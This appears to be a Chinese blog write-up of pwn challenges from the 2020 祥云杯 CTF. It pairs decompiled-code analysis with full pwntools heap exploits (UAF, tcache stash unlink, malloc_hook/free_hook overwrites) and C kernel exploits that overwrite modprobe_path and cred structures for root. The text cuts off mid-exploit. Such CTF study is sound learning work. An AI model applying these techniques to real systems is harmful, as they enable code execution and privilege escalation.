2020祥云杯

2020-11-23

字数统计: 6.1k字 | 阅读时长≈ 31分

题目数量挺多，质量也不错，而且首次在比赛接触Kernel题目，学到新知识。

Beauty_of_Changechunk

程序分析

首先题目每个libc，我通过 strings查二进制是 16.04，我以为这libc应该是 2.23了吧，结果做完之后一打远程根本不行。后面不断试，才确定至少是2.29以上，不能直接double free。

unsigned __int64 __fastcall sub_114B(__int64 a1, __int64 a2)
{
  unsigned int id; // [rsp+4h] [rbp-1Ch]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  puts("idx:");
  id = get_num();
  if ( id <= 9 && chunk_size_lst[id] )
  {
    free(chunk_list[id]);
    LOBYTE(chunk_size_lst[id]) = 0;
  }
  return __readfsqword(0x28u) ^ v4;
}

Delete函数，释放堆块时，只将 chunk_size的最低一字节设为了0。而 Edit函数是通过 chunk_size来判断是否可以修改该chunk。那么很明显了，如果申请 0x100的堆块，释放后其 size仍然为 0x100，存在 UAF漏洞。

unsigned __int64 sub_121D()
{
  unsigned int id; // [rsp+8h] [rbp-2018h]
  size_t nbytes[1025]; // [rsp+Ch] [rbp-2014h]
  unsigned __int64 v3; // [rsp+2018h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("idx:");
  id = get_num();
  memset((char *)nbytes + 4, 0, 0x400uLL);
  if ( id <= 9 )
  {
    if ( chunk_size_lst[id] )
    {
      LODWORD(nbytes[0]) = chunk_size_lst[id];
      if ( LODWORD(nbytes[0]) > 0x7F && LODWORD(nbytes[0]) <= 0x3FF )
      {
        puts("chat:");
        read(0, (char *)nbytes + 4, LODWORD(nbytes[0]));
        *(size_t *)((char *)&nbytes[LODWORD(nbytes[0]) - 1] + 4) = 0LL;
        memcpy(chunk_list[id], (char *)nbytes + 4, LODWORD(nbytes[0]));
      }
    }
  }
  return __readfsqword(0x28u) ^ v3;
}

利用分析

程序里，有一个可以输出 flag的函数。但是需要比较输入的chunk的内容和 mem_ptr的初始位置放置的随机数相等，才能输出。

那么思路很明显了，需要利用任意地址写数据修改 mem+ptr为一个我们知道的数据。这如果在 2.27以下是可以直接通过 unsortedbin attack来实现，但是这题高于 2.29，所以 unsortedbin攻击就失效了。

在高于 2.29版本时，有两种方法可以替代 unsortedbin attack，一是 tcache stash unlink，另一种是 largebin attack。

这里就直接用 tcache stash unlink即可。

布置 0x100 tcache为 6个，布置两个 small bin，试第二个的 chunk的 bk指向 mem_ptr-0x10。

然后使用 calloc分配第一个 smallbin，此时 mem_ptr被写上一个 libc地址，该地址我们可以知道。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./pwn')
    elf = ELF('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('112.126.71.170', 43652)
    elf = ELF('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

gadgets = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def New(size):
    p.sendlineafter('Enjoy scenery', '1')
    p.sendlineafter('size:\n', str(size))

def Delete(idx):
    p.sendlineafter('Enjoy scenery', '2')
    p.sendlineafter('idx:', str(idx))

def Edit(idx, content):
    p.sendlineafter('Enjoy scenery', '3')
    p.sendlineafter('idx:', str(idx))
    p.sendafter('chat:', content)

def Show(idx):
    p.sendlineafter('Enjoy scenery', '4')
    p.sendlineafter('idx:', str(idx))

def ShowFlag(content):
    p.sendlineafter('Enjoy scenery', '5')
    sleep(0.5)
    p.sendline(content)

def Show2(idx):
    p.sendlineafter('Enjoy scenery', '5')
    p.sendlineafter('input idx\n', str(idx))


def Magic():
    p.sendlineafter('Enjoy scenery', '666')


def Pwn():
    p.recvuntil('A gift from ChangChun People\n')
    mem_ptr = int(p.recv(12), 16)
    print("mem_Ptr:",hex(mem_ptr))

    New(0x100)
    New(0x80)
    New(0x100)
    Delete(1)
    New(0xa0)
    Delete(0)
    Edit(0, p64(0) + p64(0))
    Delete(0)
    Show(0)
    p.recvuntil('see\n')
    heap_addr = u64(p.recv(6).ljust(8, b'\x00')) - 0x2a0
    print('heap_addr:',hex(heap_addr))
    Edit(0, p64(0) + p64(0))
    print("fill tcache")
    for i in range(5):
        Delete(0)
        Edit(0, p64(0)+p64(0))

    # gdb.attach(p, 'bp $rebase(0x15fe)')
    print("into unsortedbin")

    Delete(1)
    New(0xa0)   #1
    Delete(1)
    Delete(0)   #unsortedbin
    print("===============>Show:")
    Show(0)
    p.recvuntil('see\n')
    main_addr = u64(p.recv(6).ljust(8, b'\x00'))
    print('main_addr:',hex(main_addr))
    libc_addr = main_addr - 96 - 0x10 - libc.sym['__malloc_hook']
    print ('libc_addr:',hex(libc_addr))

    print("===============>tcache stash unlink attack:")
    Delete(2)

    Magic()

    print("==========> tcache 6")
    payload = p64(main_addr + 0x100) + p64(heap_addr + 0x430)
    ShowFlag(payload)
    print("==========> tcache stash unlink")
    #gdb.attach(p, 'bp $rebase(0x15fe)')
    payload = p64(heap_addr+0x290) + p64(mem_ptr-0x10)
    Edit(2, payload)
    New(0x100)
    Edit(2, p64(main_addr+0x100))

    Show2(2)
    p.interactive()

Pwn()

影流之主

程序分析

这题通过strings查也是 16.04的，我吸取上一题教训，我按照2.31的做，结果是16.04，我心态已崩。以后先查清libc，再做题。

unsigned __int64 Delete()
{
  int id; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  id = 0;
  _isoc99_scanf("%d", &id);
  if ( id >= 0 && id <= 11 && ying_liu_zhi_zhu[id] )
    free(ying_liu_zhi_zhu[id]);                 // UAF
  return __readfsqword(0x28u) ^ v2;
}

漏洞很明显，一个 UAF漏洞.

利用分析

这题由于只能申请fastbin chunk，所以难点就是如何泄露 libc地址。常规思路就是利用堆合并。

之前学到一个tips，利用输入大量字符串，使得 scanf申请大量堆块来堆合并。但这题不行。

于是，只有研究 glob函数。看源码可以发现里面有很大 malloc。但是由于时间原因，没有具体分析。

开始随便输入路径，进行测试。测了很多次，发现 /*，可以刚好将 fastbin chunk合并放入 unsortedbin中。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

filename = 'ying_liu_zhi_zhu'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('112.126.71.170', 45123)
    elf = ELF(filename)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

gadgets = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def Add():
    p.sendline('1')
    #sleep(0.5)

def Delete(idx):
    p.sendline('2')
    p.sendline(str(idx))

def Edit(idx, content):
    p.sendline('3')
    p.sendline(str(idx))
    #sleep(0.5)
    p.send(content)
    sleep(0.5)

def Show(idx):
    p.sendline('4')
    p.sendline(str(idx))

def glob(content):
    p.sendline('5')
    p.sendline(content)

chunk_list = 0x602060
def Pwn():
    Add()
    Add()
    Add()
    Delete(0)
    Delete(1)

    payload = '/*'
    glob(payload)

    Show(0)
    libc_addr = u64(p.recv(6).ljust(8, b'\x00')) - 88 - 0x10 - libc.sym['__malloc_hook']
    print('libc_addr:',hex(libc_addr))
    libc.address = libc_addr
    malloc_hook = libc.sym['__malloc_hook']
    print ('malloc_hook:',hex(malloc_hook))
    gadget = gadgets[3] + libc_addr


    Add()

    Delete(2)

    payload = p64(malloc_hook-0x23)
    Edit(2, payload)

    Add()   #4
    Add()   #5

    Edit(5, 'a'*0x13+p64(gadget))
    #gdb.attach(p, 'bp 0x400c42')
    p.sendline('1')
    #gdb.attach(p, 'bp 0x400c42')
    p.interactive()

Pwn()

garden

程序分析

void DeleteVul()
{
  int idx; // [rsp+Ch] [rbp-4h]

  if ( delflag )
    exit(1);
  puts("which tree do you want to steal?");
  idx = get_num();
  if ( idx >= 0 && idx <= 8 && chunk_list[idx] )
    free(chunk_list[idx]);                      // UAF
  delflag = 1;
}

有一个 UAF后门。

利用分析

2.30 glibc，虽然有 uaf，但是直接double_free行不通。这道题卡了很久，就是不知道 malloc(0x20)的用法。

首先申请 9个块，然后逆序依次释放，为了防止进入 Unsortedbin的块合并入 top chunk。同时再释放chunk1时使用 UAF的释放函数。

然后此时，可以泄露Libc地址。同时也发生了堆块合并。

利用 malloc(0x20) 从 unsortedbin中分配出一小块，使堆头改变。

然后再依次申请堆块。此时chunk1的堆头就会是 chunk8+0xb0处。

然后释放2到7之间任意几个块，腾出空闲id。再依次释放 chunk8和 chunk1。再申请 chunk8，利用chunk8堆覆盖 chunk1的 next指向 free_hook。

最终 getshell。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./garden')
    elf = ELF('./garden')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('112.126.71.170', 43652)
    elf = ELF('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def Add(idx, content):
    p.sendlineafter('>> ', str(1))
    p.sendlineafter('tree index?', str(idx))
    p.sendlineafter('tree name?\n', content)

def Delete(idx):
    p.sendlineafter('>> ', str(2))
    p.sendlineafter('tree index?\n', str(idx))

def Show(idx):
    p.sendlineafter('>> ', str(3))
    p.sendlineafter('tree index?\n', str(idx))

def Deletevul(idx):
    p.sendlineafter('>> ', str(5))
    p.sendlineafter('want to steal?\n', str(idx))

def Magic():
    p.sendlineafter('>> ', str(6))

def Pwn():
    for i in range(9):
        Add(i, 'a')

    for i in range(7):
        Delete(8-i)

    Deletevul(1)
    Show(1)
    libc_addr = u64(p.recv(6).ljust(8, b'\x00')) - 96-0x10 -libc.sym['__malloc_hook']
    print ('libc_addr:',hex(libc_addr))
    libc.address = libc_addr
    system_addr = libc.sym['system']
    free_hook = libc.sym['__free_hook']

    Delete(0)
    Magic()

    Add(0, 'a')
    for i in range(2, 9):
        Add(i, '/bin/sh\x00')
    print("==================chunk extend")
    #gdb.attach(p, 'bp $rebase(0x15ad)')
    Delete(2)
    Delete(3)
    Delete(4)
    Delete(1)
    Delete(8)
    payload = b'a'*0xd0 + p64(0) + p64(0x111) + p64(free_hook)
    Add(1, payload)
    Add(2, 'a')

    Add(3, p64(system_addr))

    Delete(5)

    p.interactive()

Pwn()

babydev

正好最近在学kernel，看到这道题就很想把他做出来，做了很久才出，但是总算是学习了有一点成果吧。

程序分析

整个内核应该是实现了一个类似文件读写偏移操作的过程，有 write\read\llseek函数：

__int64 __fastcall mychrdev_write(__int64 a1, __int64 a2, __int64 size1, _QWORD *off)
{
  __int64 size; // rbx
  __int64 offset; // rdx
  _QWORD *off1; // r12

  size = size1;
  offset = *off;
  off1 = off;
  if ( *off > 0xFFFFLL && offset >= *(_QWORD *)(mydata + 0x10008) )
    return -105LL;
  if ( (unsigned __int64)(offset + size) > 0x10000 )
    size = (unsigned __int16)-*(_WORD *)off;
  if ( copy_from_user(*(_QWORD *)(mydata + 0x10000) + offset + mydata, a2, size) )
    return -14LL;
  *off1 += size;
  *(_QWORD *)(mydata + 0x10008) += size;
  return size;
}

write函数通过 off来当一个文件写指针，注意： 这个 off经过调试是一个全局变量。首先判断 off不能超过 0xffff，且不能超过当前文件的 size即 mydata+0x10008的值。随后 size+off不能超过 0x10000。符合条件，则将用户输入写入 *(mydata+0x10000)+offset+mydata处，写入数据为 size。最后更新文件大小，*(my_data+0x10008) += size。

__int64 __fastcall mychrdev_llseek(__int64 a1, __int64 a2, int a3)
{
  __int64 len; // rcx
  __int64 result; // rax

  len = *(_QWORD *)(mydata + 0x10008) - *(_QWORD *)(mydata + 0x10000);
  if ( a3 == 1 )                                // cur
  {
    result = *(_QWORD *)(a1 + 0x68) + a2;
    if ( result < 0 || result > len )
      return -22LL;
  }
  else if ( a3 == 2 )                           // end
  {
    if ( a2 > 0 || -a2 > len )
      return -22LL;
    result = len + a2;
  }
  else                                          // set
  {
    if ( a3 || len < a2 || a2 < 0 )
      return -22LL;
    result = a2;                                // set
  }
  if ( result < 0 || result > len )
    return -22LL;
  *(_QWORD *)(a1 + 0x68) = result;              // fd_ptr
  *(_QWORD *)(a1 + 0xB8) = 0LL;
  return result;
}

llseek函数主要功能就是实现文件读写指针的偏移。和 C语言的 lseek是类似的，我们主要关注 set模式，它能够直接将 off设置为用户设置的值，只要满足小于文件size和大于0。

那么此处，就存在一个组合漏洞。

当我们第一次执行write(fd, buf, 0xf000)时，此时 off的值为 0xf000，size为 0xf000。

然后我们利用 llseek(fd, 0, 0)，将 off的值设为 0。

然后再次执行write(fd, buf, 0xf000)，此时由于 off为0，我们是能够成功绕过 write的检测，实现 size为 0x1e000，那么此时，我们就已经能够成功实现溢出。相当于拥有了任意地址读写的能力。

利用分析

Kernel里任意地址读写漏洞提权的方法，还挺多的，这里主要参考 P4nda 和 xmzyshypnc两位学长的博客。以后关于这类洞提权的，先立个flag，以后要写一篇更详细的。

首先讲一种xmzyshypnc说得又快又稳的方法，虽然我最后都没成功，但是这种原理是行得通的。具体可以参考我之前的 Kernel进阶一篇。

主要原理就是修改 modprobe_path，该地址存储着内核发生异常时会调用的文件。而由于这道题，没有开启Kaslr，使得我们想要找到 modprobe_path十分简单：

/ # cat /proc/kallsyms | grep __request
ffffffff8106e8f0 t __request_resource
ffffffff8106f590 T __request_region
ffffffff8108f5a0 T __request_module
ffffffff810c36e0 T __request_percpu_irq

pwndbg> x/28i 0xffffffff8108f5a0
   0xffffffff8108f5a0:	push   rbp
   0xffffffff8108f5a1:	mov    rbp,rsp
   0xffffffff8108f5a4:	push   r15
   0xffffffff8108f5a6:	push   r14
   0xffffffff8108f5a8:	push   r13
   0xffffffff8108f5aa:	push   r12
   0xffffffff8108f5ac:	movzx  r13d,dil
   0xffffffff8108f5b0:	push   r10
   0xffffffff8108f5b2:	push   rbx
   0xffffffff8108f5b3:	lea    r10,[rbp+0x10]
   0xffffffff8108f5b7:	mov    ebx,edi
   0xffffffff8108f5b9:	sub    rsp,0xc0
   0xffffffff8108f5c0:	mov    QWORD PTR [rbp-0x50],rdx
   0xffffffff8108f5c4:	mov    QWORD PTR [rbp-0x48],rcx
   0xffffffff8108f5c8:	mov    rax,QWORD PTR gs:0x28
   0xffffffff8108f5d1:	mov    QWORD PTR [rbp-0x68],rax
   0xffffffff8108f5d5:	xor    eax,eax
   0xffffffff8108f5d7:	test   dil,dil
   0xffffffff8108f5da:	mov    QWORD PTR [rbp-0x40],r8
   0xffffffff8108f5de:	mov    QWORD PTR [rbp-0x38],r9
   0xffffffff8108f5e2:	jne    0xffffffff8108f763
   0xffffffff8108f5e8:	xor    r12d,r12d
   0xffffffff8108f5eb:	cmp    BYTE PTR [rip+0x13b4fee],0x0        # 0xffffffff824445e0
   0xffffffff8108f5f2:	jne    0xffffffff8108f61b
   0xffffffff8108f5f4:	mov    rcx,QWORD PTR [rbp-0x68]
   0xffffffff8108f5f8:	xor    rcx,QWORD PTR gs:0x28
   0xffffffff8108f601:	mov    eax,r12d
   0xffffffff8108f604:	jne    0xffffffff8108f91c
pwndbg> x/s 0xffffffff824445e0
0xffffffff824445e0:	"/sbin/modprobe"

可以发现上图中，modprobe_path的地址是 0xffffffff824445e0，而且这个地址是固定的。我们只需要利用我们上面的任意地址写漏洞就能修改 modprobe_path的值为我们自己的脚本。

但是，这道题，当我改完这个值后。qemu直接卡住了，我内核调试，可以看到已经被我修改了。但是不知道为啥卡住了。

EXP(stuck)

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <errno.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <sys/syscall.h>
#include <stdint.h>
#define CREATE 0x73311337
#define SHOW 0xDEADBEEF
#define DELETE 0x13377331


void create_slab(int fd, unsigned long long size) {
    ioctl(fd, CREATE, size);
}

void show(int fd) {
    ioctl(fd, SHOW, NULL);
}

void delete(int fd){
    ioctl(fd, DELETE, NULL);
}

int main(void) {
    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/getflag.sh");
    system("chmod +x /tmp/getflag.sh");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/ll");
    system("chmod +x  /tmp/ll");
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    int fd = open("/dev/mychrdev", O_RDWR);
    char *buf = malloc(0x1000);

    memset(buf, 'a', 0x1000);

    ioctl(fd, 0x1111, buf);
    //unsigned long long data_addr = 0;
    u_char *p = buf;
    printf("%d\n", *(int *)p);
    p += 4;
    printf("%s\n", p);
    p += 0x10;
    printf("0x%x\n", *(int *)p);
    p += 4;
    printf("0x%X\n", *(size_t *)p);
    p += 8;
    printf("0x%llX\n", *(size_t *)p);

    printf("Please input data_addr:");

    unsigned long long dataaddr = 0;
    scanf("%llx", &dataaddr);

    printf("data addr:%llx\n", dataaddr);
    for(int i = 0; i<0x1000; i++)
    {
        write(fd, buf, 0xf000);
        llseek(fd, 0, 0);
    }
    puts("attack begin");
    llseek(fd, 0x10008, 0);

    getchar();
    getchar();

    unsigned long long modprobe_addr = 0x777f730045e0 + dataaddr;
    printf("modporbe_path: 0x%lx\n",modprobe_addr);
    unsigned long long offset = modprobe_addr -  dataaddr;
    printf("offset:%llx\n",offset);

    unsigned long long off = offset+500;

    write(fd, &off, 20);

    llseek(fd, offset, 0);
    write(fd, "/tmp/getflag.sh\x00", 20);

    system("/tmp/ll");
    system("cat /flag");
    puts("finished");
    return 0;
 
}

修改cred结构提升权限

这种思路，很早之前 P4nda学长就已经详细分析过，这里我就算做个学习笔记吧。

每个线程在内核中都对应一个线程栈、一个线程结构块 thread_info去调度，结构体里包含了线程的一系列信息：

该 thread_info结构体存放在线程栈的最低地址，对应的结构体定义：

struct thread_info {
	struct task_struct	*task;		/* main task structure */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	mm_segment_t		addr_limit;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */
};

thread_info中最重要的结构体是 task_struct结构体，如下：

struct task_struct {
	volatile long state;	/* -1 unrunnable, 0 runnable, >0 stopped */
	void *stack;
	atomic_t usage;
	unsigned int flags;	/* per process flags, defined below */
	unsigned int ptrace;
... ...

/* process credentials */
	const struct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */
	const struct cred __rcu *real_cred; /* objective and real subjective task
					 * credentials (COW) */
	const struct cred __rcu *cred;	/* effective (overridable) subjective task
					 * credentials (COW) */
	char comm[TASK_COMM_LEN]; /* executable name excluding path
				     - access with [gs]et_task_comm (which lock
				       it with task_lock())
				     - initialized normally by setup_new_exec */
/* file system info */
	struct nameidata *nameidata;
#ifdef CONFIG_SYSVIPC
/* ipc stuff */
	struct sysv_sem sysvsem;
	struct sysv_shm sysvshm;
#endif
... ... 
};

可以看到其中有一个 cred结构体，其表示的就是当前线程的权限，只要将这个结构的uid-fsgid全部覆写为0，就可以把这个线程权限提升为 root(root uid 为 0)

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

而其中，cred结构体表示的是这个线程的权限，只要将这个结构的uid-fsgid全部覆写为0就可以把这个线程权限提升为 root（root uid为0）

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

那么一旦我们有了任意地址读写漏洞，那么就有一个很直接的利用方法，就是找到 cred结构体的位置，将用于表示权限的数据位写为0，即完成提权。

在 task_struct里有一个 comm[TASK_COMM_LEN] 结构，这个结构可以通过 prctl函数中的 PR_SET_NAME功能，设置为小于 16字节的字符串。

那么，可以通过先使用该函数，将 comm 设为一个字符串，然后我们遍历查找该字符串，即可找到 task_struct结构体，进入找到 cred结构体。

由于 task_struct 是由 kmem_cache_alloc_node分配，因此 task_struct 应该存在内核的动态分配区域。这里放一个内存映射图，以后可能会用。爆破范围应该在：

0xffff880000000000~0xffffc80000000000

0xffffffffffffffff  ---+-----------+-----------------------------------------------+-------------+
                       |           |                                               |+++++++++++++|
    8M                 |           | unused hole                                   |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffffffffff7ff000  ---|-----------+------------| FIXADDR_TOP |--------------------|+++++++++++++|
    1M                 |           |                                               |+++++++++++++|
0xffffffffff600000  ---+-----------+------------| VSYSCALL_ADDR |------------------|+++++++++++++|
    548K               |           | vsyscalls                                     |+++++++++++++|
0xffffffffff577000  ---+-----------+------------| FIXADDR_START |------------------|+++++++++++++|
    5M                 |           | hole                                          |+++++++++++++|
0xffffffffff000000  ---+-----------+------------| MODULES_END |--------------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
    1520M              |           | module mapping space (MODULES_LEN)            |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffffffffa0000000  ---+-----------+------------| MODULES_VADDR |------------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
    512M               |           | kernel text mapping, from phys 0              |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffffffff80000000  ---+-----------+------------| __START_KERNEL_map |-------------|+++++++++++++|
    2G                 |           | hole                                          |+++++++++++++|
0xffffffff00000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    64G                |           | EFI region mapping space                      |+++++++++++++|
0xffffffef00000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    444G               |           | hole                                          |+++++++++++++|
0xffffff8000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    16T                |           | %esp fixup stacks                             |+++++++++++++|
0xffffff0000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    3T                 |           | hole                                          |+++++++++++++|
0xfffffc0000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    16T                |           | kasan shadow memory (16TB)                    |+++++++++++++|
0xffffec0000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    1T                 |           | hole                                          |+++++++++++++|
0xffffeb0000000000  ---+-----------+-----------------------------------------------| kernel space|
    1T                 |           | virtual memory map for all of struct pages    |+++++++++++++|
0xffffea0000000000  ---+-----------+------------| VMEMMAP_START |------------------|+++++++++++++|
    1T                 |           | hole                                          |+++++++++++++|
0xffffe90000000000  ---+-----------+------------| VMALLOC_END   |------------------|+++++++++++++|
    32T                |           | vmalloc/ioremap (1 << VMALLOC_SIZE_TB)        |+++++++++++++|
0xffffc90000000000  ---+-----------+------------| VMALLOC_START |------------------|+++++++++++++|
    1T                 |           | hole                                          |+++++++++++++|
0xffffc80000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
    64T                |           | direct mapping of all phys. memory            |+++++++++++++|
                       |           | (1 << MAX_PHYSMEM_BITS)                       |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffff880000000000 ----+-----------+-----------| __PAGE_OFFSET_BASE | -------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
    8T                 |           | guard hole, reserved for hypervisor           |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffff800000000000 ----+-----------+-----------------------------------------------+-------------+
                       |-----------|                                               |-------------|
                       |-----------| hole caused by [48:63] sign extension         |-------------|
                       |-----------|                                               |-------------|
0x0000800000000000 ----+-----------+-----------------------------------------------+-------------+
    PAGE_SIZE          |           | guard page                                    |xxxxxxxxxxxxx|
0x00007ffffffff000 ----+-----------+--------------| TASK_SIZE_MAX | ---------------|xxxxxxxxxxxxx|
                       |           |                                               |  user space |
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
    128T               |           | different per mm                              |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
0x0000000000000000 ----+-----------+-----------------------------------------------+-------------+

EXP（Success）

参考 P4nda的EXP，我改写了一个本题的EXP。这个 EXP写了巨久，主要是 C 语言太差了，改了好多次，tcl了。

这里有一个注意点，就是我们之前的EXP只用向后读写即可。但是当我找 cred结构体时，向后找了很久都找不到。所以猜测可能是在 my_data之前。所以，我又想了很久怎么向前任意读写。后面的方法是覆盖 0x10001处开始的地址，则是计算 size=0x10000-0x10001=-1，由于 size是 unsigned int16，所以 size将会变成 0xffff。而我们写得位置 0x10001刚好是 begin_ptr+1的位置，这样相等于我们就能够修改 begin_ptr除最低一字节的其他位。而最低一字节让他等于 ‘\x00’，对我们的影响就很小了。这样我们就可以向 begin_ptr中写入负数，然后程序读写的时候是通过my_data + begin_ptr+offset来计算需要读写指针，如果让 begin_ptr为负数，让 offset为0，那么就能往 my_data之前读写了。

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <errno.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/prctl.h>

size_t user_cs, user_rflags, user_ss, user_rsp;

void init(){
        setbuf(stdin,0);
        setbuf(stdout,0);
        setbuf(stderr,0);
}

void save_user_status(){
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("[+] Save User Status");
    printf("user_cs = %pn",user_cs);
    printf("user_ss = %pn",user_ss);
    printf("user_rsp = %pn",user_rsp);
    printf("user_rflags = %pn",user_rflags);
    puts("[+] Save Success");
}

void exploit(){
    int fd = open("/dev/mychrdev",O_RDWR);
    if (fd < 0){
        puts("open fail!");
        return 0;
    }
    char* buf = malloc(0x1000);
    ioctl(fd, 0x1111, buf);
 
    u_char *p = buf;

    p += 4;
    p += 0x10;
    p += 4;
    p += 8;

    printf("0x%llX\n", *(size_t *)p);

    printf("Please input data_addr:");
 
